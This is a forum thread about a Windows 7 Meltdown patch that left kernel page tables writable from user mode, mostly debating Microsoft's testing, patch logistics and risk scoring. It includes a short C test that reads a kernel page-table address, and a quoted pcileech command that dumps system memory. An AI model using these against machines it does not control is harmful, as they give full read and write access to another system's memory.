
Windows 7 patch for Meltdown enabled arbitrary reads and writes in kernel memory - romac
http://blog.frizk.net/2018/03/total-meltdown.html?m=1
======
lmilcin
This is what happens when devs are presented with a very complicated problem,
extremely short deadline and enormous amount of pressure.

~~~
gruez
>extremely short deadline

they had 6 months.

~~~
maltalex
> they had 6 months.

You say that like 6 months is automatically a lot of time. "She had 6 months
to give birth". Yeah, only it takes 9, so 6 is short.

Consider the scope and depth of the issue and the fact that they probably
couldn't involve too many people on this effort.

~~~
chris_wot
The Linux kernel developers came up with a decent solution, how can it be that
they can do this and the Microsoft developers cannot?

~~~
rxhernandez
Is Windows written the exact same way as Linux? Never underestimate the amount
of technical debt that can be holding a team down.

~~~
chris_wot
It appears not, if such a bad bug can get through all the way to release.

~~~
Raymonf
"Linux" had a bug in which you could log into a system by pressing backspace
28 times a few years ago. And by Linux, I meant GRUB[1], and in turn, (many)
Linux systems.

We're comparing Linux and Windows, an operating system that contains 3.5
million files[2] (of course, not just the kernel in this case). That isn't
really fair. Code is as perfect as humans can make it, and it certainly does
not help that there's so much to take into account.

[1] [http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-
by...](http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html)

[2] [https://arstechnica.com/gadgets/2018/03/building-
windows-4-m...](https://arstechnica.com/gadgets/2018/03/building-
windows-4-million-commits-10-million-work-items/)

~~~
pecg
This GRUB bug you are talking about, is not a kernel problem though; on a side
note, I'm going to read on the links you provided as I want to see if
encrypted root partitions could also be compromised, I suspect no.

------
caf
A really simple test you can compile with cygwin - if it doesn't crash, the
bug is present:

    
    
      #include <stdio.h>
      
      int main()
      {
              volatile unsigned long *ptr = (volatile unsigned long *)0xFFFFF6FB7DBED000;
      
              printf("%lx\n", *ptr);
              return 0;
      }

~~~
mgerdts
I seem to be unable to find a patch that will make it so that this doesn't
run. Windows Update says that I have all required patches. I first tried
KB4088875. That didn't cause this program to fail. Then I tried "2018-03
Preview of Monthly Quality Rollup for Windows 7 for x64-based Systems
(KB4088881)", which was only a recommended update. That didn't help either.

~~~
mysterypie
Same for me. I tested a Windows 7 x64 system which has all security patches,
but caf's "really simple test" above still runs, which seems to indicate that
the bug still exists. Same as you, I applied KB4088881, which was the only
pending update, but it made no difference.

Also, I tried the command from the orginal article:

 _pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force_

This creates 5GB file which does look like a raw memory dump. I'm not sure how
to interpret this; I don't know what the behavior should be with or without
the bug.

------
well_done
Well, let's take a breath and be grateful that even MS can mess something like
this up.

One dev or 1000, who cares, whatever they chose did not work particularly
well. Are "they" to blame? Yes. Are the engineers to blame? Probably not. Is
management the culprit? We don't know.

What's left? Next time your customers bug you about some random downtime
caused by an overworked datacenter intern, don't feel stressed. Take the time
to remember that even if you would've had billions of dollars, years of
experience and thousands of employees, you could've messed up, just like MS
did :)

~~~
gerdesj
"Take the time to remember that even if you would've [sic] had billions of
dollars, years of experience and thousands of employees, you could've messed
up, just like MS did :)"

When you are the direct, contracted, IT support for a company then you _do_
have responsibilities. You might be considered responsible for timely delivery
of patches - a fair argument in court I think. Mitigations might involve
helpdesk logs as well as contracts.

well_done: Your tone comes across as BOFH. I'm possibly a simple PHB who owns
an electric cattle prod that is wired up to the mains (three phase) but I
prefer to get sign off for a project via work committed and not threat done.

~~~
freehunter
>Your tone comes across as BOFH

I didn't read it like that, and I'm usually the first to read things
negatively. I read it as motivational: don't feel bad about your own mistakes,
even the big guys with tons of money and a lot of really smart people mess up
sometimes. So cut yourself some slack and just do the best you can.

~~~
gerdesj
"Next time your customers bug you about some random downtime caused by an
overworked datacenter intern, don't feel stressed. Take the time to remember
that even if you would've had billions of dollars, years of experience and
thousands of employees, you could've messed up, just like MS did :)"

I missed the :) which might sound a bit naff now but was probably intended to
deflect comments like mine. Hit taken. However I did invoke BOFH which is (I
hope) normally seen as an indication that a comment is not to be taken too
seriously.

EDIT: BOFH => Negative - nope, not here.

~~~
freehunter
You're correct, I read "BOFH" as a negative. I apologize since you did not
mean it in that way. I never thought that BOFH would ever be considered the
good guy in the story :)

------
amluto
Yeesh. I didn’t know that Windows still uses the self-referential page table
trick. This makes me very nervous, especially since they seem to keep it
mapped in the user page tables. This seems likely to poke a big hole in ASLR
if nothing else. It’s a _huge_ target for write-what-where exploits.

~~~
ryuuchin
They changed it in Windows 10 (RS1 IIRC)[1].

[1] [http://www.alex-ionescu.com/?p=323](http://www.alex-ionescu.com/?p=323)

~~~
caf
The tl;dr is that they're still using the self-referential page table trick,
however the PTE_BASE is now randomised at runtime with dynamic fixups.

------
tambourine_man
Security is hard. I don't think I'd have the stomach to work on kernel or
encryption code.

The worst I can do here in userland is crash or delete data. And that's pretty
bad already

~~~
HankB99
I dunno. I think a program that produces subtly wrong results is the worst. It
reminds me of a project I once did. It involved producing reports from tens of
thousands of records including summing some of the fields. I was constrained
to work on Windows so I put the date into an SQL server database and used MS
Access to produce very nice looking reports. I reviewed the reports and
everything "looked OK" so I handed them to the users for approval. They users
were accountants. They added up the partial sums and pointed out that the
results were only approximately correct. It turns out that MS Access is not so
good at arithmetic. I restructured the reports to perform the arithmetic in
the SQL queries and just use MS Access to format it for a pretty page. I also
checked the arithmetic before handing the next revision over.

Better testing (as in more than a superficial glance) would have caught this
before review but there always exists the possibility that subtle bugs can
sneak past even well thought tests.

Just my own experience and opinion.

~~~
NamTaf
Agreed. I was doing an derailment investigation a number of years ago which
involved digging through event recorder logfiles. The event recorder is such
that it writes an entry every second but only updates GPS 20 seconds, so it
writes GPS coordinates against every 20th entry.

What I discovered was that the event recorders on certain locomotives updated
GPS at the 20th second rather than the 0th second. This meant that the GPS
entry next to each line was in fact offset by 20 seconds - i.e. the entry for
02:11:40 was in fact what was sampled at 02:11:20. I think they must've held
the GPS coordinate in memory somewhere but updated it AFTER writing that
second's entry, so they wrote 02:11:20 whilst holding 02:11:00's GPS, then
updated it, but then written that update at 02:11:40, etc. This was a fault
with the design of the event recorders, not just one loco, as it occurred on
each of that type that I looked at.

This confused me so much because it looked right - it was in the right general
location, it was updating, etc. - but for a solid few days I did a bunch of
analysis thinking the train was in a different location to where it really
was. I eventaully picked up on it when subtle things kept not adding up and
verified it by watching another loco come to a stop but then see the GPS keep
moving for a bit afterwards until it settled.

I agree with you, subtly wrong results are the worst.

------
blinkingled
I guess upgrade to Windows 10 is the message Microsoft is trying to get out
here?

Laying off all those QA and testing people will have some downside - MS seems
to be letting older versions take the hit.

~~~
Silhouette
Perhaps. However, Microsoft has published very clear guidance on how long
previous versions of Windows would receive support for, specifically including
the period for security updates. Doing what you're describing is effectively
reneging on that deal, and that sends a very different kind of message.

~~~
blinkingled
Sure, I have a hard time believing MS would purposefully screw their Win 7/8
enterprise customers - but the issue at hand suggests it's at the very least a
byproduct of their new strategy of focus on Win 10 and the decision to do with
less QA/Testers by involving more end users to participate in testing. Thus
Win 7 users end up with slower, less tested patches and no hardware support
backports. To be fair only the less tested patches sound terrible.

------
computator
Has anyone actually confirmed this bug? The author seems to be an expert in
low-level DMA security, but it would be nice to see independent confirmation.
Reading through the comments so far, it doesn't seem so. The closest anyone
comes is this:
[https://news.ycombinator.com/item?id=16693599](https://news.ycombinator.com/item?id=16693599)

I was hoping to see someone who said:

(1) I tested a Windows 7 X64 machine without the Meltdown patch (pre-December
2017) and couldn't read arbitrary memory.

(2) Next I tested with Microsoft's Meltdown patch KBnnnnnnn (Jan or Feb 2018)
and _could_ read arbitrary memory. The system is insecure.

(3) I then tested with Microsoft patch KBnnnnnnn (March 2018) and can no
longer read arbitrary memory. They fixed it.

~~~
caf
I did use a modified version of my short test program to actually test
modifying the page tables to read a chosen physical address, which worked just
fine. The bug is real.

~~~
BrianG61UK
And KBnnnnnn that fixes it is which KB?

------
lifeisstillgood
My take on this is a little bit dumb, but, once upon a time, many moons ago, I
thought I understood the CPU I acted upon, I could peek and poke and look up
what was where. I mostly wanted faster, but what i got was more complex.

Is there a way to just get faster without the complexity. What would a new cpu
architecture and OS look like if we started again? is there room for open
hardware to save us all?

~~~
exikyut
Superscalar processing was unfortunately a major step forward in terms of
performance.

The answer in [https://stackoverflow.com/questions/8389648/how-do-i-
achieve...](https://stackoverflow.com/questions/8389648/how-do-i-achieve-the-
theoretical-maximum-of-4-flops-per-cycle/8402970) is interesting; I'm
particularly fascinated by the temperature warning (the answer author's CPU
got to 76C in testing).

My CPU's sitting at 30C right now. It maybe climbs to 48C if Chrome's being
stupid, and 50+C if I'm doing something mildly taxing. I've never made it go
beyond 60C IIRC.

So, modern CPUs are _so_ efficient that they're simply just never hitting
their maximum throughput. I think that's pretty incredible.

The sad thing about CPUs that don't use modern (superscalar, multi-stage,
microarched, etc) design is that they just can't keep up.

And people's OCD about speed and (more frequently) parallelization nowadays
drives what they'll buy. Something had better have a killer feature if it
isn't fast or highly parallel.

So it's possible, but a huge headache. Whatever you built would likely be
highly purpose-specific.

------
avhon1
The article says that this vulnerability was patched in March 2018, so at
least there's that.

~~~
gerdesj
I'm still working on a bloody huge list of customer updatathons for Meltdown
and Speccy. Now I have to go back around a load of them that I have already
patched and find the Win 7s and 2008r2s and update those before I continue.

Oh well, it gives me something to do of an evening 8)

~~~
Someone1234
Why are you manually patching workstations? WSUS allows central management
(inc. zone deployment), but even in Windows 7's default state it should apply
these updates without intervention.

2008R2 I can see doing it by hand, but Windows 7 clients is odd. Particularly
as it seems to be taking you two months to apply urgent patches.

~~~
gerdesj
Some of my customer VMs are Windows 7 - Veeam proxies for example. I also take
backups quite seriously. Yes this is all a bit manual in some cases.

(Nearly) All of them are on the end of an IPSEC VPN that I can get at from
home via the office web proxy and another VPN or via magic. Some of them have
192.168.0/24 or 192.168.1.0/24 - those are on the end of OpenVPN. I wrote
this:
[https://doc.pfsense.org/index.php/OpenVPN_NAT_subnets_with_s...](https://doc.pfsense.org/index.php/OpenVPN_NAT_subnets_with_same_IP_range)
. You have no idea what networking is about until you've had to do that sort
of nonsense a few times 8)

I don't have the luxury of one WSUS to manage, we have loads of the bloody
things. Some customers have pretty skilled local IT depts, some have somewhat
vocal users that accuse you of resetting their passwords after spending hours
doing way more than they have paid for and would not understand what you are
on about in the first place. I love them all equally as any parent would ...

When I get bored of watching Windows Update I run apt update && apt upgrade &&
reboot on a few machines and keep a weather eye on the monitoring system. When
I get really bored, I run up yaourt on my laptop or my office PC. When I've
got a newly installed Win system or two to patch, I fire up a few emerge -Uvh
--deep --newuse --keep-going @world sessions (I'm not really joking here) or
run up genkernel.

Yes, there is the default state designed by .... bbzzzzrrt .... soz, lost it,
and then there is reality. Could I also remind you that there is rather more
to patching than WSUS:

* Firmware - Dell, HPE and Co have had to do rather a lot of work here and had to start again in Jan when Intel dropped the ball * Hypervisors - I generally see VMware - that's a lot of patching and don't forget that some of them were buggered, so need excluding. * VM vHardware versions - yep, all those little lovelies have their own hardware types to worry about * "My fooking factory runs 24x7 - what are you going to do about it?" .... "Yes but you didn't go for the full cluster version _sign_ I'll see what I can do" ...

You think I'm odd! No mate, my little company are well aware of automation and
use it where we can but we are pragmatic and have to deal with a lot of
reality.

We could of course bind our customers to our iron will and enforce our policy
and stuff. They would not work on weekends or other odd hours. They would not
insist on doing things their way and they absolutely would pay us on time -
they generally do 8)

------
0x0
Wow, that's crazy. About as bad as it gets for local privesc!

------
pishpash
So why does this only affect Windows 7?

~~~
cptskippy
Probably because after Windows 7 they started a kernel rewrite , known as
MinWin, to extricate the Win32 Userland tendrils that had crept into the
Kernel since the NT days.

[https://en.wikipedia.org/wiki/MinWin](https://en.wikipedia.org/wiki/MinWin)

~~~
container
The article doesn't seem to indicate that MinWin started after Windows 7. If
there has been a fundamental kernel change effort after Win7 (I'm not aware of
one), maybe it has a different name?

~~~
cptskippy
You're right, for some reason my brain said Vista came after Windows 7. Given
that 7 came after Vista my theory makes no sense.

------
rocqua
Any indication of whether this was actually exploited? I really don't want to
do a full key-rotation routine.

Also, does windows 7 map the entire address space into kernel memory? That is,
would this have enabled direct memory access to other processors.

~~~
MarkSweep
My understanding of the article is that the page table itself was writable. So
you an attacking process could map in the entire memory of the computer and
read everything, regardless of what was in the kernel's version page table.

~~~
caf
The attacking process could also put whatever code it wanted into the kernel,
and so give itself full access to everything on disk as well.

------
daveheq
This sounds contradictory:

"Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are
vulnerable. If your system isn't patched since December 2017 or if it's
patched with the 2018-03 patches or later it will be secure."

"I discovered this vulnerability just after it had been patched in the 2018-03
Patch Tuesday. I have not been able to correlate the vulnerability to known
CVEs or other known issues."

------
yuhong
The fun thing is that even MS admitted it break non-PAE kernels and pre-SSE2
processors (in the most recent one). I have been fighting a similar bug in one
of the Jet 4.0 patches for a while now.

------
kerng
Sounds like Microsoft found and patched it independently already. Afterwards
someone else (blog author) found it too, maybe by reversing the patch from
patch Tuesday.

------
ams6110
Predictable. Fixing old bugs introduces new bugs.

~~~
Arwill
I wonder for how long Windows as a software can continue to grow. I looked at
the list of services, and its crazy. So much exotic functionality, and so many
of what i don't ever need. Then the file system, there are even hidden folders
managed by windows itself, that just grow and take up space. All that adds to
complexity, and increases the probability for bugs. I wish there was a version
of the OS that just shed all that unnecessary functionality and returned to
basics. Something like a minimalist Linux distro, but able to run all games
and office.

~~~
ksk
Hmm, but it appears that windows has fewer security bugs than Linux. Is there
any data showing otherwise?

(TBH, this is already unfair, comparing the kernel with an entire OS)

[https://www.cvedetails.com/top-50-products.php](https://www.cvedetails.com/top-50-products.php)

[https://www.cvedetails.com/product/47/Linux-Linux-
Kernel.htm...](https://www.cvedetails.com/product/47/Linux-Linux-
Kernel.html?vendor_id=33)

[https://www.cvedetails.com/product/32238/Microsoft-
Windows-1...](https://www.cvedetails.com/product/32238/Microsoft-
Windows-10.html?vendor_id=26)

[https://www.cvedetails.com/product/17153/Microsoft-
Windows-7...](https://www.cvedetails.com/product/17153/Microsoft-
Windows-7.html?vendor_id=26)

[https://www.cvedetails.com/product/22318/Microsoft-
Windows-8...](https://www.cvedetails.com/product/22318/Microsoft-
Windows-8.html?vendor_id=26)

~~~
gerdesj
"Hmm, but it appears that windows has fewer security bugs than Linux. Is there
any data showing otherwise?"

Yes, I think you are being a bit of a noddy comparing a kernel with an entire
OS. That said, all software has bugs. Blimey, how on earth can you compare the
paltry 3000000000000 odd source files of Windows tucked up in GIT with the
gazzilions of source files that comprises a modern Linux based system (let
alone the BSDs etc).

I will simply mention here that when I update an LTS Ubuntu or Debian box I
run "apt update && apt upgrade && reboot" (or use a GUI if I'm bored) and it
takes a few seconds to minutes to update the entire system. Everything. That
includes Java, Flash, Office suites, graphics drivers, USB drivers, printer
drivers, CAD suites, database servers, web servers, PHP, Python, Perl, Rust,
Go, ... need I go on. Everything. The same happens when I use pacman or yourt,
or emerge, or yum, or rpm or whatever.

I'm personally CREST accredited, so have a fair idea about security and prefer
to spend my time doing stuff and not waiting for updates to install (if I can
even find them) - you?

~~~
exikyut
FWIW WinXP is officially quoted as 45 million lines of code
([https://www.facebook.com/windows/posts/155741344475532](https://www.facebook.com/windows/posts/155741344475532)),
everyone's decided Win10 is 5-10 (some say 15-20) million more.

I've been meaning to SLOCcount Linux sometime, actually!

Having said that, I don't think it'll be 45M LOC. The kernel is 20M LOC
([https://www.linuxcounter.net/statistics/kernel](https://www.linuxcounter.net/statistics/kernel)).
Chrome is 18M (excluding blank lines/comments)
([https://www.openhub.net/p/chrome/analyses/latest/languages_s...](https://www.openhub.net/p/chrome/analyses/latest/languages_summary)).
LibreOffice is 9M LOC
([https://www.openhub.net/p/libreoffice](https://www.openhub.net/p/libreoffice)).

And then I found out that KDE is 60M LOC!!
([https://www.openhub.net/p/kde](https://www.openhub.net/p/kde))

GNOME is 9M
([https://www.openhub.net/p/gnome](https://www.openhub.net/p/gnome)).

But I'm guessing those two stats are comparing just the base desktop
environment in GNOME's case with all the productivity apps (including KWrite
et al) and system libraries (including QtWebKit et al). This must be kept in
mind.

TL;DR, an incredibly basic system with _just_ a word processor and web
browser, and maybe a minimal windowmanager on top, would be 47M. Adding KDE in
makes it 107M - but you're almost never going to use all of it (whereas with
Chrome and LibreOffice some large proportion of that 18M and 9M is loaded into
RAM and potentially targetable).

~~~
gerdesj
Mate, the sheer amount of LoC in any modern system is nearly uncountable. I
have been a serious Gentoo aficionado for many years. My lap has been burnt
for hours simply compiling Firefox or LO. They are both massive and they are
only two apps.

If you want to SLOC Linux then download it
[https://www.kernel.org/](https://www.kernel.org/) and help yourself. Why not
look here as well [https://www.freebsd.org](https://www.freebsd.org) and
others - those are my mates, and good ones.

------
stefan_
I guess we know now that from the 3000000 files or what it was they boasted
about, not a lot of them are some sort of unit test..

~~~
egeozcan
How can you test against an unknown bug?

~~~
asdsa5325
Testing to make sure you can't read from somewhere you are not supposed to
read from seems like a pretty obvious test for an OS.

~~~
tedunangst
There are lots of places you're not supposed to read from. Does any operating
system have 100% test coverage of addresses that aren't supposed to be
readable?

~~~
PeterisP
IDK, there's a quite narrow whitelisted known range of addresses that _should_
be readable by your process; you could (and should) certainly have an simple
automated test that simply tries to read everything with the expectation that
it should succeed only in known cases.

------
gerdesj
I'm just about to add this to our Risk Register. I'm thinking of 0.01 x 100
(our scoring system is 1-3 x 1-3.) That means I think it is very unlikely but
seriously (I will probably offend someone if I let loose here) nasty.

~~~
vardump
So you'd give this 1 on a scale from 1 to 3? Presumably 3 being the most
serious.

That doesn't make any sense. If this bug is present, this is instant total
control of a PC. That's as bad as it gets.

~~~
stordoff
Unless OP edited his post, he appears to be scoring it 100 (i.e. it's off the
scale).

~~~
vardump
I misread grandparent post. The scale is 1-3 x 1-3, in other words, from 1 to
9.

0.01 * 100 is 1.

~~~
stordoff
Ah, I see. I was reading it as two axes, not a product.

~~~
gerdesj
Yes a product although the term "two axes" works as well. It's a pretty common
way of quantifying "risk" into something that you can tabulate and form a todo
list. You list your risks and give each one a score from 0-9 that is made up
of "chance of happening" x "business impact or importance or whatever". You
could score either as zero as well which will obviously cause the total score
to be zero.

I'll be changing our Risk Reg soon to become a Risks and Opportunities
Register after a discussion in our last ISO 9001 audit. Not sure how the
scoring scheme will work for that yet.

This may look like a bit of a silly pseudo formal exercise but it really does
help with decision making. There's nothing wrong with bending the scores
either, if you are open about it. It is simply a way of prioritising a list of
things to do in the end.

I have to be a PHB sometimes as well as a sysadmin 8)

